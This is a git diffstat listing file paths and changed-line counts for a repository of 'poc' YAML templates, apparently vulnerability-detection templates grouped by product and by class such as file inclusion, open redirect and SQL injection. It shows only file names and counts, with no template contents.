poc/jenkins/jenkins-default-8270.yaml | 10 +- ...default.yaml => jenkins-default-8272.yaml} | 0 poc/jenkins/jenkins-detect-8275.yaml | 27 - poc/jenkins/jenkins-detect-8276.yaml | 34 + poc/jenkins/jenkins-login-8277.yaml | 27 - poc/jenkins/jenkins-login-8280.yaml | 18 + poc/jenkins/jenkins-script-8284.yaml | 46 - poc/jenkins/jenkins-script.yaml | 35 + poc/jenkins/jenkins-stack-trace-8285.yaml | 27 + poc/jenkins/jenkins-stack-trace-8287.yaml | 3 +- poc/jenkins/unauthenticated-jenkins.yaml | 50 +- poc/joomla/joomla-com-fabrik-lfi-8370.yaml | 16 +- ...i-8371.yaml => joomla-com-fabrik-lfi.yaml} | 0 poc/joomla/joomla-config-file-8376.yaml | 10 +- poc/joomla/joomla-config-file-8377.yaml | 12 +- poc/joomla/joomla-file-listing-8380.yaml | 36 + poc/joomla/joomla-file-listing.yaml | 22 - poc/joomla/joomla-htaccess-8381.yaml | 9 +- poc/joomla/joomla-manifest-file-8386.yaml | 17 +- poc/joomla/joomla-manifest-file-8388.yaml | 14 +- poc/joomla/joomla-panel-8389.yaml | 16 + poc/joomla/joomla-panel-8391.yaml | 18 - poc/joomla/joomla-panel.yaml | 9 +- poc/joomla/joomla-workflow-8394.yaml | 2 +- poc/joomla/joomla-workflow.yaml | 13 - poc/joomla/rusty-joomla-9955.yaml | 24 +- poc/joomla/rusty-joomla.yaml | 38 + .../kafka-center-default-login-8415.yaml | 13 +- poc/kafka/kafka-center-default-login.yaml | 42 + poc/kafka/kafka-center-login.yaml | 19 +- poc/kafka/kafka-connect-ui-8423.yaml | 2 +- poc/kafka/kafka-consumer-monitor-8424.yaml | 18 + poc/kafka/kafka-consumer-monitor-8425.yaml | 21 - poc/kafka/kafka-consumer-monitor.yaml | 21 +- poc/kafka/kafka-cruise-control-8426.yaml | 5 +- poc/kafka/kafka-cruise-control-8427.yaml | 5 +- poc/kafka/kafka-monitoring-8428.yaml | 18 + poc/kafka/kafka-monitoring-8430.yaml | 4 +- poc/kafka/kafka-monitoring-8431.yaml | 18 - poc/kong/kong-detect-8499.yaml | 30 +- poc/kong/kong-detect-8501.yaml | 28 +- poc/laravel/laravel-debug-enabled-8576.yaml | 27 - poc/laravel/laravel-debug-enabled.yaml | 23 - poc/laravel/laravel-env-8582.yaml | 52 + 
poc/laravel/laravel-env-8583.yaml | 8 +- poc/laravel/laravel-filemanager-lfi-8587.yaml | 6 +- poc/laravel/laravel-filemanager-lfi-8588.yaml | 4 + poc/laravel/laravel-ignition-xss-8593.yaml | 18 +- poc/laravel/laravel-ignition-xss.yaml | 30 + poc/laravel/laravel-log-file-8596.yaml | 31 - poc/laravel/laravel-log-file-8598.yaml | 16 +- poc/laravel/laravel-telescope-8600.yaml | 18 +- poc/laravel/laravel-telescope-8601.yaml | 13 +- poc/ldap/phpldapadmin-panel.yaml | 41 + .../Karel-ip-phone-lfi.yaml | 20 +- .../accent-microcomputers-lfi-14.yaml | 17 +- .../accent-microcomputers-lfi-16.yaml | 33 + .../accent-microcomputers-lfi-17.yaml | 34 - .../ad-widget-lfi-124.yaml | 33 - .../ad-widget-lfi-126.yaml | 19 +- .../admin-word-count-column-lfi-81.yaml | 25 + .../admin-word-count-column-lfi.yaml | 14 +- ...l => advanced-access-manager-lfi-116.yaml} | 0 .../advanced-access-manager-lfi.yaml | 35 - .../asanhamayesh-lfi-552.yaml | 32 - .../asanhamayesh-lfi-553.yaml | 21 + .../asanhamayesh-lfi.yaml | 13 +- .../bems-api-lfi-709.yaml | 25 - .../bems-api-lfi-711.yaml | 22 +- .../bems-api-lfi-712.yaml | 24 - .../blue-ocean-excellence-lfi-756.yaml | 33 - .../brandfolder-lfi-778.yaml | 14 +- poc/local_file_inclusion/brandfolder-lfi.yaml | 35 - .../bullwark-momentum-lfi-806.yaml | 19 +- .../bullwark-momentum-lfi-807.yaml | 39 - .../bullwark-momentum-lfi-808.yaml | 16 +- poc/local_file_inclusion/cherry-lfi-902.yaml | 11 +- poc/local_file_inclusion/cherry-lfi-903.yaml | 37 + .../churchope-lfi-915.yaml | 11 +- poc/local_file_inclusion/churchope-lfi.yaml | 32 - .../cs-cart-unauthenticated-lfi-1284.yaml | 26 + ....yaml => cs-cart-unauthenticated-lfi.yaml} | 0 .../db-backup-lfi-6774.yaml | 25 - .../db-backup-lfi-6775.yaml | 30 + .../db-backup-lfi-6776.yaml | 11 +- poc/local_file_inclusion/db-backup-lfi.yaml | 4 - .../diarise-theme-lfi-6990.yaml | 17 +- .../diarise-theme-lfi.yaml | 27 - .../dicoogle-pacs-lfi-6993.yaml | 11 +- poc/local_file_inclusion/eibiz-lfi-7185.yaml | 8 +- 
poc/local_file_inclusion/eibiz-lfi-7187.yaml | 13 +- .../elfinder-detect-7201.yaml | 12 +- .../elfinder-detect-7202.yaml | 15 +- .../elfinder-path-traversal-7203.yaml | 37 - ...rsal.yaml => elfinder-path-traversal.yaml} | 0 .../elfinder-version-7205.yaml | 19 +- .../elfinder-version.yaml | 38 - .../generic-linux-lfi.yaml | 10 +- .../generic-windows-lfi-7591.yaml | 35 + .../generic-windows-lfi.yaml | 31 +- .../geovision-geowebserver-lfi-7595.yaml | 20 +- .../geovision-geowebserver-lfi-7596.yaml | 17 +- .../global-domains-lfi-7715.yaml | 13 +- .../global-domains-lfi.yaml | 28 + poc/local_file_inclusion/goip-1-lfi-7763.yaml | 11 +- poc/local_file_inclusion/goip-1-lfi-7764.yaml | 23 - .../groupoffice-lfi-7849.yaml | 19 + .../groupoffice-lfi-7850.yaml | 6 +- poc/local_file_inclusion/groupoffice-lfi.yaml | 28 + poc/local_file_inclusion/gsoap-lfi-7855.yaml | 14 +- poc/local_file_inclusion/gsoap-lfi.yaml | 19 + .../hb-audio-lfi-7911.yaml | 19 +- .../hb-audio-lfi-7912.yaml | 13 +- .../health-check-lfi-7922.yaml | 15 +- .../hide-security-enhancer-lfi-7952.yaml | 18 +- .../hide-security-enhancer-lfi.yaml | 23 - .../hrsale-unauthenticated-lfi-8039.yaml | 23 +- .../hrsale-unauthenticated-lfi-8041.yaml | 9 +- .../huawei-hg255s-lfi-8059.yaml | 24 +- .../huawei-hg255s-lfi-8060.yaml | 27 - .../huawei-hg659-lfi-8071.yaml | 5 - .../huawei-hg659-lfi.yaml | 21 - .../issuu-panel-lfi-8199.yaml | 6 +- poc/local_file_inclusion/issuu-panel-lfi.yaml | 29 + poc/local_file_inclusion/jeewms-lfi-8253.yaml | 9 +- poc/local_file_inclusion/jeewms-lfi.yaml | 28 - .../jinfornet-jreport-lfi-8307.yaml | 19 + .../jinfornet-jreport-lfi-8308.yaml | 23 - .../jinfornet-jreport-lfi.yaml | 6 +- .../jolokia-unauthenticated-lfi-8366.yaml | 31 + ....yaml => jolokia-unauthenticated-lfi.yaml} | 0 .../joomla-com-fabrik-lfi-8370.yaml | 16 +- ...i-8371.yaml => joomla-com-fabrik-lfi.yaml} | 0 .../karel-ip-phone-lfi-8436.yaml | 9 +- .../kyocera-m2035dn-lfi-8557.yaml | 16 +- .../kyocera-m2035dn-lfi-8559.yaml | 8 +- 
.../laravel-filemanager-lfi-8587.yaml | 6 +- .../laravel-filemanager-lfi-8588.yaml | 4 + poc/local_file_inclusion/lfi-linux-fuzz.yaml | 78 + poc/local_file_inclusion/lfi.yaml | 67 +- poc/local_file_inclusion/linux-lfi-fuzz.yaml | 30 +- .../magicflow-lfi-8710.yaml | 8 +- .../magicflow-lfi-8713.yaml | 22 +- .../minimouse-lfi-8877.yaml | 23 + poc/local_file_inclusion/minimouse-lfi.yaml | 1 + .../moodle-filter-jmol-lfi-8938.yaml | 20 - .../moodle-filter-jmol-lfi-8939.yaml | 4 +- .../moodle-filter-jmol-lfi-8941.yaml | 20 +- poc/local_file_inclusion/mpsec-lfi-8957.yaml | 18 +- poc/local_file_inclusion/mpsec-lfi.yaml | 35 - .../oliver-library-lfi-9239.yaml | 16 +- .../oliver-library-lfi-9241.yaml | 13 +- .../opencti-lfi-9267.yaml | 25 +- .../opencti-lfi-9268.yaml | 31 - .../opensis-lfi-9317.yaml | 19 +- poc/local_file_inclusion/opensis-lfi.yaml | 28 - .../oracle-fatwire-lfi-9380.yaml | 21 +- .../orbiteam-bscw-server-lfi-9404.yaml | 33 + .../orbiteam-bscw-server-lfi.yaml | 12 +- ...-lfi.yaml => pacsone-server-lfi-9428.yaml} | 0 .../pacsone-server-lfi-9429.yaml | 20 +- .../phpwiki-lfi-9567.yaml | 3 +- poc/local_file_inclusion/pikpikculfi.yaml | 67 - .../processmaker-lfi-9660.yaml | 2 +- .../processmaker-lfi-9662.yaml | 32 +- .../qihang-media-lfi-9769.yaml | 44 - .../qihang-media-lfi.yaml | 37 + .../ruijie-networks-lfi-9938.yaml | 7 +- .../ruijie-networks-lfi-9942.yaml | 1 - .../samsung-wlan-ap-lfi-10000.yaml | 29 + .../samsung-wlan-ap-lfi-9999.yaml | 25 - .../shortcode-lfi-10214.yaml | 7 +- .../shortcode-lfi-10216.yaml | 14 +- .../simple-image-manipulator-lfi-10281.yaml | 7 +- .../simple-image-manipulator-lfi-10282.yaml | 25 + .../simple-image-manipulator-lfi.yaml | 17 +- .../sl-studio-lfi-10321.yaml | 17 +- poc/local_file_inclusion/sl-studio-lfi.yaml | 22 + poc/local_file_inclusion/sniplets-lfi.yaml | 22 +- .../sofneta-mecdream-pacs-lfi-10350.yaml | 13 +- .../sofneta-mecdream-pacs-lfi.yaml | 30 + .../targa-camera-lfi-10654.yaml | 10 +- .../targa-camera-lfi-10655.yaml | 23 
+- .../thinkcmf-lfi-10721.yaml | 21 + .../thinkcmf-lfi-10723.yaml | 33 - .../video-synchro-pdf-lfi-11006.yaml | 9 +- .../video-synchro-pdf-lfi-11007.yaml | 25 + .../video-synchro-pdf-lfi.yaml | 9 +- .../vmware-vcenter-lfi-11047.yaml | 41 - .../vmware-vcenter-lfi-linux-11042.yaml | 2 +- .../vmware-vcenter-lfi.yaml | 27 + poc/local_file_inclusion/wordpress-LFI.yaml | 6 +- poc/local_file_inclusion/wordpress-lfi.yaml | 21 - .../wordpress-wordfence-lfi-11346.yaml | 21 + .../wordpress-wordfence-lfi-11348.yaml | 4 +- .../wordpress-wordfence-lfi-11350.yaml | 21 - .../wp-javospot-lfi-11482.yaml | 38 + poc/local_file_inclusion/wp-javospot-lfi.yaml | 26 - ...p-memphis-documents-library-lfi-11495.yaml | 38 + ...p-memphis-documents-library-lfi-11496.yaml | 4 +- .../wp-simple-fields-lfi-11566.yaml | 19 +- .../wp-simple-fields-lfi-11569.yaml | 20 - .../wp-socialfit-xss-11577.yaml | 4 +- poc/local_file_inclusion/wp-tinymce-lfi.yaml | 10 +- .../wp-tutor-lfi-11596.yaml | 17 +- ...tutor-lfi-11600.yaml => wp-tutor-lfi.yaml} | 0 .../wp-vault-lfi-11610.yaml | 4 +- .../xerox-efi-lfi-11683.yaml | 11 +- poc/local_file_inclusion/xerox-efi-lfi.yaml | 33 + .../yishaadmin-lfi-11744.yaml | 12 +- poc/local_file_inclusion/yishaadmin-lfi.yaml | 33 + poc/magento/magento-2-exposed-api-8687.yaml | 5 +- poc/magento/magento-2-exposed-api-8688.yaml | 45 + poc/magento/magento-admin-panel-8690.yaml | 21 + poc/magento/magento-admin-panel-8692.yaml | 28 - poc/magento/magento-admin-panel-8695.yaml | 6 +- poc/magento/magento-cacheleak-8696.yaml | 15 +- poc/magento/magento-cacheleak-8699.yaml | 40 - poc/magento/magento-config-disclosure.yaml | 50 - poc/magento/magento-detect-8706.yaml | 8 +- poc/microsoft/74cms-sqli-9.yaml | 7 +- .../{74cms-sqli-10.yaml => 74cms-sqli.yaml} | 0 ...aml => aims-password-mgmt-client-219.yaml} | 0 .../aims-password-mgmt-client-221.yaml | 17 + poc/microsoft/aims-password-portal-225.yaml | 22 + poc/microsoft/aims-password-portal.yaml | 2 +- poc/microsoft/api-buttercms-403.yaml | 22 
+- poc/microsoft/bems-api-lfi-709.yaml | 25 - poc/microsoft/bems-api-lfi-711.yaml | 22 +- poc/microsoft/bems-api-lfi-712.yaml | 24 - poc/microsoft/bolt-cms-panel-762.yaml | 38 - poc/microsoft/bolt-cms-panel-763.yaml | 37 + poc/microsoft/bolt-cms-panel.yaml | 17 +- ...k-cms-840.yaml => call-break-cms-838.yaml} | 0 poc/microsoft/chamilo-lms-sqli-892.yaml | 37 - poc/microsoft/chamilo-lms-sqli.yaml | 26 + poc/microsoft/cisco-systems-login-973.yaml | 25 + poc/microsoft/cisco-systems-login-975.yaml | 32 - poc/microsoft/cisco-systems-login.yaml | 12 +- poc/microsoft/craft-cms-detect-1247.yaml | 3 +- poc/microsoft/craft-cms-detect.yaml | 28 - .../dahua-wpms-addimgico-fileupload.yaml | 78 +- ...dedecms-carbuyaction-fileinclude-6794.yaml | 30 + ... => dedecms-carbuyaction-fileinclude.yaml} | 0 ...aml => dedecms-membergroup-sqli-6796.yaml} | 0 .../dedecms-membergroup-sqli-6798.yaml | 15 +- poc/microsoft/dedecms-openredirect-6800.yaml | 14 +- poc/microsoft/dedecms-openredirect-6802.yaml | 18 +- .../default-microsoft-azure-page-6873.yaml | 9 +- .../default-microsoft-azure-page-6874.yaml | 6 +- ...7085.yaml => dotcms-admin-panel-7087.yaml} | 0 poc/microsoft/dotnetcms-sqli-7089.yaml | 22 +- poc/microsoft/dotnetcms-sqli.yaml | 25 - .../duomicms-sql-injection-7124.yaml | 27 + poc/microsoft/duomicms-sql-injection.yaml | 22 + ...recms-xss.yaml => empirecms-xss-7218.yaml} | 0 poc/microsoft/empirecms-xss-7220.yaml | 25 - poc/microsoft/ems-login-panel-7223.yaml | 18 - poc/microsoft/feifeicms-lfr-7464.yaml | 6 +- poc/microsoft/feifeicms-lfr.yaml | 26 - poc/microsoft/fuelcms-default-login-7571.yaml | 16 +- poc/microsoft/fuelcms-default-login-7572.yaml | 20 +- ...fuzzing-xss-get-params-html-injection.yaml | 8 +- poc/microsoft/getsimple-cms-detect-7614.yaml | 8 +- poc/microsoft/getsimple-cms-detect-7615.yaml | 9 +- poc/microsoft/grav-cms-detect-7842.yaml | 3 +- poc/microsoft/grav-cms-detect.yaml | 27 - poc/microsoft/isams-panel.yaml | 45 + poc/microsoft/jeewms-lfi-8253.yaml | 9 +- 
poc/microsoft/jeewms-lfi.yaml | 28 - .../kevinlab-bems-backdoor-8453.yaml | 18 +- .../kevinlab-bems-backdoor-8456.yaml | 18 +- poc/microsoft/kevinlab-bems-sqli-8457.yaml | 30 - poc/microsoft/kevinlab-bems-sqli-8459.yaml | 20 +- .../kevinlab-hems-backdoor-8463.yaml | 7 + .../kevinlab-hems-backdoor-8465.yaml | 25 +- .../kevinlab-hems-backdoor-8467.yaml | 41 - poc/microsoft/kiwitcms-login-8496.yaml | 11 +- poc/microsoft/lotuscms-rce-8650.yaml | 25 - poc/microsoft/lotuscms-rce-8651.yaml | 10 +- poc/microsoft/lotuscms-rce-8652.yaml | 34 + poc/microsoft/lotuscms-rce-8653.yaml | 22 +- poc/microsoft/maccmsv10-backdoor-8683.yaml | 15 +- poc/microsoft/maccmsv10-backdoor-8686.yaml | 23 +- poc/microsoft/metatag-cms-8832.yaml | 14 +- poc/microsoft/metatag-cms-8833.yaml | 31 - ...microsoft-exchange-server-detect-8853.yaml | 33 + ...microsoft-exchange-server-detect-8854.yaml | 26 + .../microsoft-exchange-workflow-8855.yaml | 11 - .../microsoft-exchange-workflow.yaml | 11 + poc/microsoft/ms-adcs-detect-8960.yaml | 24 - poc/microsoft/ms-adcs-detect-8961.yaml | 29 + poc/microsoft/ms-adcs-detect.yaml | 7 +- poc/microsoft/msmtp-config-8967.yaml | 42 + poc/microsoft/myucms-lfr-8985.yaml | 25 - poc/microsoft/myucms-lfr-8987.yaml | 15 - poc/microsoft/netlify-cms-9039.yaml | 19 - poc/microsoft/netlify-cms-9041.yaml | 19 + .../octobercms-default-login-9192.yaml | 65 - poc/microsoft/octobercms-default-login.yaml | 59 + poc/microsoft/octobercms-detect-9195.yaml | 25 - poc/microsoft/octobercms-detect-9196.yaml | 12 +- poc/microsoft/odoo-cms-redirect-9199.yaml | 19 + poc/microsoft/odoo-cms-redirect-9201.yaml | 11 +- poc/microsoft/pandora-fms-console-9451.yaml | 20 - poc/microsoft/pandora-fms-console-9453.yaml | 21 + poc/microsoft/pandora-fms-console.yaml | 22 +- .../pbootcms-database-file-download-9469.yaml | 29 + .../pbootcms-database-file-download.yaml | 20 +- poc/microsoft/plone-cms-detect-9607.yaml | 23 - ...detect.yaml => plone-cms-detect-9608.yaml} | 0 
poc/microsoft/powercreator-cms-rce-9645.yaml | 42 + poc/microsoft/powercreator-cms-rce.yaml | 37 + poc/microsoft/quick-cms-sqli.yaml | 42 + poc/microsoft/reflected-params.yaml | 339 +- poc/microsoft/rhymix-cms-detect-9877.yaml | 13 +- poc/microsoft/rhymix-cms-detect-9878.yaml | 22 + poc/microsoft/saferoads-vms-login-9971.yaml | 17 - poc/microsoft/saferoads-vms-login-9973.yaml | 16 + poc/microsoft/saferoads-vms-login.yaml | 18 +- poc/microsoft/samsung-printer-detect.yaml | 22 +- poc/microsoft/samsung-wlan-ap-lfi-10000.yaml | 29 + poc/microsoft/samsung-wlan-ap-lfi-9999.yaml | 25 - poc/microsoft/samsung-wlan-ap-rce-10009.yaml | 23 +- poc/microsoft/samsung-wlan-ap-rce-10010.yaml | 9 +- poc/microsoft/samsung-wlan-ap-xss-10012.yaml | 25 + poc/microsoft/samsung-wlan-ap-xss.yaml | 24 - .../samsung-wlan-default-login-10018.yaml | 45 + poc/microsoft/seaCMS-sqli.yaml | 28 +- poc/microsoft/seacms-rce-10101.yaml | 24 + poc/microsoft/seacms-sqli-10103.yaml | 39 + .../seeddms-default-login-10125.yaml | 16 +- .../seeddms-default-login-10127.yaml | 20 +- poc/microsoft/seeddms-detect-10129.yaml | 40 +- poc/microsoft/seeddms-detect-10131.yaml | 21 + poc/microsoft/sevone-nms-network-manager.yaml | 32 - poc/microsoft/tikiwiki-cms-10773.yaml | 20 + poc/microsoft/tikiwiki-cms-10775.yaml | 20 - poc/microsoft/top-xss-params-10807.yaml | 75 + poc/microsoft/top-xss-params-10809.yaml | 81 - poc/microsoft/vpms-auth-bypass-11066.yaml | 33 + poc/microsoft/vpms-auth-bypass-11068.yaml | 32 - ...r-xss.yaml => wems-manager-xss-11192.yaml} | 0 poc/microsoft/wems-manager-xss-11194.yaml | 21 +- poc/microsoft/wondercms-detect-11222.yaml | 24 + poc/microsoft/wondercms-detect.yaml | 21 - poc/microsoft/wp-arforms-listing-11415.yaml | 31 + .../wp-mstore-plugin-listing-11500.yaml | 30 + ...62.yaml => wp-sfwd-lms-listing-11564.yaml} | 0 poc/microsoft/wp-sfwd-lms-listing-11565.yaml | 3 +- poc/microsoft/wp-super-forms-11585.yaml | 19 +- poc/microsoft/wp-super-forms-11588.yaml | 17 +- 
poc/microsoft/wuzhicms-detect-11653.yaml | 11 +- poc/microsoft/wuzhicms-detect-11654.yaml | 30 + poc/microsoft/wuzhicms-detect.yaml | 24 + poc/microsoft/wuzhicms-sqli-11659.yaml | 38 +- poc/microsoft/xdcms-sqli-11664.yaml | 30 - poc/microsoft/xdcms-sqli-11666.yaml | 18 +- poc/microsoft/zcms-v3-sqli-11773.yaml | 23 - poc/microsoft/zcms-v3-sqli.yaml | 12 +- poc/microsoft/zhixiangOA-msglog.aspx-sql.yaml | 4 +- poc/microsoft/zms-auth-bypass-11830.yaml | 33 + poc/microsoft/zms-auth-bypass-11832.yaml | 34 - .../alibaba-mongoshake-unauth-268.yaml | 27 + .../alibaba-mongoshake-unauth-270.yaml | 10 +- poc/mongodb/mongodb-detect-8920.yaml | 20 + poc/mongodb/mongodb-detect.yaml | 20 +- poc/mongodb/mongodb-ops-manager.yaml | 19 +- poc/mongodb/mongodb-unauth-8925.yaml | 22 - poc/mongodb/mongodb-unauth-8928.yaml | 15 +- poc/mongodb/rockmongo-default-login-9897.yaml | 47 + poc/mongodb/rockmongo-default-login-9899.yaml | 11 +- poc/mongodb/rockmongo-xss-9902.yaml | 28 - poc/mongodb/rockmongo-xss-9904.yaml | 23 +- .../unauthenticated-mongo-express.yaml | 23 + poc/mysql/exposed-mysql-initial-7323.yaml | 17 +- poc/mysql/exposed-mysql-initial-7324.yaml | 9 +- poc/mysql/mysql-native-password-8981.yaml | 5 +- poc/mysql/mysql-native-password.yaml | 21 +- poc/netlify/api-netlify-470.yaml | 31 - poc/netlify/api-netlify.yaml | 25 + poc/netlify/netlify-cms-9039.yaml | 19 - poc/netlify/netlify-cms-9041.yaml | 19 + poc/nginx/default-nginx-page-6880.yaml | 5 +- poc/nginx/default-nginx-page-6881.yaml | 19 + ...l => git-config-nginxoffbyslash-7628.yaml} | 0 .../git-config-nginxoffbyslash-7630.yaml | 35 + poc/nginx/nginx-config-9098.yaml | 26 +- ...inx-config.yaml => nginx-config-9099.yaml} | 0 poc/nginx/nginx-linux-page-9102.yaml | 17 - poc/nginx/nginx-linux-page-9103.yaml | 6 +- poc/nginx/nginx-linux-page.yaml | 17 - poc/nginx/nginx-proxy-manager-9111.yaml | 3 +- poc/nginx/nginx-proxy-manager-9114.yaml | 4 +- poc/nginx/nginx-version-9122.yaml | 25 - poc/nginx/nginx-version-9123.yaml | 30 + 
poc/nginx/nginx-version.yaml | 5 - poc/nodejs/gradle-cache-node-detect-7797.yaml | 3 +- poc/nodejs/kube-api-nodes-8507.yaml | 18 +- poc/nodejs/kube-api-nodes-8508.yaml | 25 - poc/nodejs/kube-api-nodes.yaml | 22 - poc/nodejs/lfr_express.yaml | 38 - poc/nodejs/node-ecstatic-listing.yaml | 33 + poc/nodejs/node-integration-enabled-9136.yaml | 17 + poc/nodejs/node-integration-enabled-9137.yaml | 20 - .../puppet-node-manager-detect-9720.yaml | 27 - poc/nodejs/puppet-node-manager-detect.yaml | 20 + poc/nodejs/unauthenticated-mongo-express.yaml | 23 + ...ized-puppet-node-manager-detect-10958.yaml | 20 + ...ized-puppet-node-manager-detect-10959.yaml | 24 - ...authorized-puppet-node-manager-detect.yaml | 9 +- poc/open_redirect/Sap-redirect.yaml | 8 +- .../age-gate-open-redirect-207.yaml | 36 - poc/open_redirect/age-gate-open-redirect.yaml | 29 + .../attitude-theme-open-redirect.yaml | 20 - poc/open_redirect/aws-redirect-651.yaml | 24 + poc/open_redirect/aws-redirect-652.yaml | 13 +- poc/open_redirect/bitrix-open-redirect.yaml | 50 +- .../brandfolder-open-redirect-779.yaml | 23 - .../brandfolder-open-redirect-782.yaml | 22 +- .../dedecms-openredirect-6800.yaml | 14 +- .../dedecms-openredirect-6802.yaml | 18 +- .../drupal-user-enum-redirect-7115.yaml | 21 +- .../eatery-restaurant-open-redirect-7158.yaml | 30 + .../eatery-restaurant-open-redirect.yaml | 20 - .../elementorpage-open-redirect.yaml | 13 +- .../homeautomation-v3-openredirect-7985.yaml | 18 - .../httpbin-open-redirect-8049.yaml | 27 +- poc/open_redirect/httpbin-open-redirect.yaml | 23 - .../music-store-open-redirect-8972.yaml | 20 +- .../music-store-open-redirect.yaml | 21 + ...newsletter-manager-open-redirect-9075.yaml | 4 +- .../newsletter-manager-open-redirect.yaml | 4 +- .../newsletter-open-redirect-9076.yaml | 16 +- .../newsletter-open-redirect.yaml | 22 - poc/open_redirect/odoo-cms-redirect-9199.yaml | 19 + poc/open_redirect/odoo-cms-redirect-9201.yaml | 11 +- .../office365-open-redirect-9212.yaml | 25 +- 
.../office365-open-redirect-9215.yaml | 24 - poc/open_redirect/open-redirect-9310.yaml | 139 +- .../otobo-open-redirect-9409.yaml | 30 - .../otobo-open-redirect-9411.yaml | 11 +- .../pieregister-open-redirect-9577.yaml | 13 +- .../pieregister-open-redirect-9579.yaml | 4 +- .../pieregister-plugin-open-redirect.yaml | 19 - poc/open_redirect/pollbot-redirect-9621.yaml | 4 +- poc/open_redirect/pollbot-redirect-9622.yaml | 27 + poc/open_redirect/sap-redirect.yaml | 22 - .../ultimatemember-open-redirect-10877.yaml | 30 - .../ultimatemember-open-redirect-10879.yaml | 6 +- poc/open_redirect/url-redirect.yaml | 142 +- ...ekender-newspaper-open-redirect-11186.yaml | 26 +- .../weekender-newspaper-open-redirect.yaml | 18 - ...ress-redirection-plugin-listing-11306.yaml | 22 - ...ess-redirection-plugin-listing-11308.yaml} | 0 .../wp-grimag-open-redirect-11458.yaml | 17 + .../wp-grimag-open-redirect-11461.yaml | 9 +- .../wp-grimag-open-redirect-11462.yaml | 26 +- ...=> wp-gtranslate-open-redirect-11463.yaml} | 0 .../wp-gtranslate-open-redirect-11465.yaml | 22 - .../wp-prostore-open-redirect-11546.yaml | 17 - .../wp-prostore-open-redirect-11549.yaml | 14 +- .../wp-prostore-open-redirect-11550.yaml | 20 + .../wptouch-open-redirect-11592.yaml | 24 + .../wptouch-open-redirect-11595.yaml | 23 +- .../wptouch-plugin-open-redirect.yaml | 13 +- poc/oracle/metadata-oracle-8829.yaml | 36 + poc/oracle/metadata-oracle.yaml | 40 - poc/oracle/oracle-business-control-9346.yaml | 4 +- poc/oracle/oracle-business-control-9347.yaml | 20 - poc/oracle/oracle-dbass-detect-9350.yaml | 1 - poc/oracle/oracle-dbass-detect-9351.yaml | 21 - poc/oracle/oracle-dbass-detect.yaml | 18 - poc/oracle/oracle-dbcs-9353.yaml | 9 +- ...oracle-ebs-bispgraph-file-access-9360.yaml | 16 +- .../oracle-ebs-sqllog-disclosure-9369.yaml | 26 - .../oracle-ebs-sqllog-disclosure-9370.yaml | 18 +- poc/oracle/oracle-ebs-xss-9373.yaml | 29 + poc/oracle/oracle-ebs-xss-9376.yaml | 33 - poc/oracle/oracle-ebs-xss-9377.yaml | 6 +- 
poc/oracle/oracle-fatwire-lfi-9380.yaml | 21 +- poc/oracle/oracle-http-server-12c-9383.yaml | 4 +- poc/oracle/oracle-http-server-12c-9384.yaml | 19 + poc/oracle/oracle-httpserver12c.yaml | 9 +- .../oracle-integrated-manager-9386.yaml | 32 - .../oracle-integrated-manager-9388.yaml | 8 +- .../oracle-iplanet-web-server-9392.yaml | 28 + poc/oracle/oracle-iplanet-web-server.yaml | 21 - poc/oracle/oracle-opera-login.yaml | 38 + poc/oracle/oracle-people-enterprise-9394.yaml | 22 - poc/oracle/oracle-siebel-xss-9400.yaml | 25 +- poc/oracle/oracle-siebel-xss-9402.yaml | 10 +- poc/other/3cx-management-console-2.yaml | 10 +- poc/other/3g-wireless-gateway-5.yaml | 5 +- poc/other/3g-wireless-gateway-6.yaml | 14 +- poc/other/44 - T9.yaml | 44 +- poc/other/ATHD-DVR-fileRead.yaml | 4 +- poc/other/Alibaba-Anyproxy-fileRead.yaml | 5 +- poc/other/LayerSlider-plugin.yaml | 58 + poc/other/NETSurveillance-fileRead.yaml | 3 + poc/other/X-Remote-IP.yaml | 19 - poc/other/access-log.yaml | 11 +- poc/other/acenet-panel.yaml | 30 + poc/other/acrolinx-dashboard.yaml | 14 +- poc/other/activemq-panel-49.yaml | 28 - poc/other/activemq-panel-52.yaml | 2 + poc/other/activemq-panel-53.yaml | 19 + ...etix-panel.yaml => acunetix-panel-56.yaml} | 0 ...x-panel-54.yaml => acunetix-panel-58.yaml} | 0 poc/other/adiscon-loganalyzer.yaml | 12 +- poc/other/adminer-panel-74.yaml | 51 - poc/other/adminer-panel-77.yaml | 41 + poc/other/adminset-panel-78.yaml | 7 +- poc/other/adminset-panel-79.yaml | 34 + poc/other/adminset-panel-80.yaml | 28 - poc/other/advance-setup-119.yaml | 32 + poc/other/advance-setup-122.yaml | 7 +- poc/other/akamai-cloudtest-253.yaml | 24 - poc/other/akamai-cloudtest.yaml | 57 +- poc/other/alibaba-canal-info-leak-266.yaml | 35 - poc/other/alienvault-usm-271.yaml | 30 + poc/other/alienvault-usm-272.yaml | 10 +- poc/other/ampps-admin-panel-304.yaml | 5 +- poc/other/ampps-admin-panel-305.yaml | 35 - poc/other/ampps-admin-panel-306.yaml | 40 + ...listing.yaml => ampps-dirlisting-307.yaml} | 0 
poc/other/ampps-dirlisting-308.yaml | 16 +- poc/other/ampps-panel-309.yaml | 9 +- poc/other/ampps-panel-310.yaml | 40 + poc/other/ansible-semaphore-panel.yaml | 34 + poc/other/antsword-backdoor-333.yaml | 40 - poc/other/antsword-backdoor.yaml | 35 + poc/other/arcgis-panel-531.yaml | 5 +- .../artifactory-anonymous-deploy-549.yaml | 30 - poc/other/artifactory-anonymous-deploy.yaml | 10 +- poc/other/asana.yaml | 14 +- poc/other/aspose-file-download-558.yaml | 27 + poc/other/aspose-file-download-560.yaml | 19 +- poc/other/aspose-ie-file-download-562.yaml | 6 +- poc/other/aspose-pdf-file-download.yaml | 29 - poc/other/aspose-words-file-download-571.yaml | 35 + poc/other/aspose-words-file-download-572.yaml | 20 +- poc/other/audiobookshelf-panel.yaml | 38 + poc/other/automation-direct-596.yaml | 3 +- poc/other/automation-direct-597.yaml | 42 - poc/other/avtech-avn801-camera-panel.yaml | 11 +- poc/other/axis-happyaxis-669.yaml | 9 +- poc/other/axis-happyaxis-670.yaml | 31 - poc/other/axis-happyaxis.yaml | 31 + poc/other/barracuda-panel-686.yaml | 6 +- ...da-panel-685.yaml => barracuda-panel.yaml} | 0 poc/other/bash-scanner.yaml | 5 +- poc/other/basic-cors-694.yaml | 12 +- .../{basic-dns-example.yaml => basic.yaml} | 0 poc/other/beyondtrust-panel-720.yaml | 21 + poc/other/bigip.yaml | 57 - poc/other/bingmaps.yaml | 14 +- poc/other/bitly.yaml | 9 +- poc/other/bitrix-panel-748.yaml | 32 + poc/other/bitrix-panel-750.yaml | 27 - ...anel-767.yaml => bookstack-panel-766.yaml} | 0 